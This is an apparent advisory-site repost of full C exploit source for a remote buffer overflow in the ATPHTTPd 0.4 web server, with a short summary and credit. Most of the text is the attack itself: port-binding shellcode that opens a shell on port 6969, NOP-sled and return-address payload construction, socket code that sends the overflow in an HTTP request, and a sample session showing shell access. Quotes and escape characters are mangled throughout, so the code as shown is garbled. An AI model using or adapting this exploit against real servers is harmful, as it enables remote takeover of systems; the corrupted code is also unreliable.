‘ATPHTTPd Buffer Overflow Exploit Code’

Summary

ATPHTTPd, the tiny, caching, high performance webserver suffers from a buffer overflow problem that allows remote command execution. The following is an exploit code that can be used to test for this vulnerability.’

Credit:

‘The information has been provided by Methodic.’


Details

Vulnerable systems:
ATPHTTPd version 0.4

Exploit:
/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
 * ‘Tamer Sahin’ <ts@securityoffice.net> posted to BUGTRAQ that there
 * was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
 * source for the hell of it. Ran ye old perl Ax4000|nc and did some
 * gdb’n and noticed that it said the return address was 0x41414141.
 * Well that speaks for itself…
 *
 * – dmuz@angrypacket.com
 */

/*
 * developed and tested against OpenBSD. exploit creates a port-binding
 * shell on the remote machine on port 6969 with the uid of the server.
 * try offsets between 5000 and -5000 with increments of 100. -200 worked
 * like a charm for me.
 *
 * ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
 * [methodic@vulnhost] [~]$ nc localhost 6969
 * whoami
 * methodic
 * id
 * uid=1009(methodic) gid=1009(methodic)
 * ^C punt!
 *
 * mad thankz to vegac who helped me with a lame bug i was over looking
 */

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

/* 701 A’s to own the EIP */
#define LEN 900
#define NOP 0x90

/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

unsigned long get_sp(void) {
  __asm__(‘movl %esp,%eax’);
}

int main(int argc, char *argv[]) {

  int sockfd=0, port=0, offset=0;
  int ch, i;
  long retaddr;
  char *host=NULL, http_request[LEN+20];
  char *payload, *ptr=(char *)&shellcode;
  struct sockaddr_in s;

  while ((ch = getopt(argc, argv, ‘h:p:o:’)) != -1) {
    switch (ch) {
      case ‘h’:
        host = optarg;
        break;
      case ‘p’:
        port = atoi(optarg);
        break;
      case ‘o’:
        offset = atol(optarg);
        break;
    }
  }

  printf(‘>> atphttpd 0.4b exploit, written by angrypacket security crewn’);
  if(!host) {
    usage(argv[0]);
  }
  if(!port) {
    port = 80;
  }

  /* setup socket structure */
  bzero(&s, sizeof(s));
  s.sin_family = AF_INET;
  s.sin_port = htons(port);
  s.sin_addr.s_addr = inet_addr(host);

  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    perror(‘ + socket’);
    exit(1);
  }

  if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
    perror(‘ + connect’);
    exit(1);
  }

  /* build c0dez.. */
  payload = (char *)malloc(LEN);

  retaddr = get_sp() – offset;
  printf(‘ + building payload [retaddr: 0x%lx] [offset: %ld]n’, retaddr, offset);

  /* fill the buffer with return addr’s */
  for(i = 0; i < LEN; i += 4)
    *(long *)&payload[i] = retaddr;

  /* fill in some NOPs */
  for(i = 0; i < ((LEN/2) – 100); i++)
    *(payload + i) = NOP;

  /* copy the shellcode and terminate the payload string */
  memcpy(payload + i, ptr, strlen(ptr));
  payload[LEN-1] = ‘’;

  bzero(&http_request, LEN+20);
  strcpy(http_request, ‘GET ‘);
  strcat(http_request, payload);
  strcat(http_request, ‘ HTTP/1.0rnrn’);
  free(payload);

  printf(‘ + sending payload to <%s> on port [%d].. ‘, host, port);
  send(sockfd, http_request, strlen(http_request), 0);
  printf(‘donen’);
  close(sockfd);

  printf(‘ + now connect to port 6969 on <%s> (be good!)n’, host);
  printf(‘>> visit http://sec.angrypacket.com for more security toolsn’);

  return(0);

}

int usage(char *progname) {
  fprintf(stderr, ‘usage: %s -h <target ip> -p <target port> -o <offset>n’, progname);
  exit(0);
}’

Categories: Exploits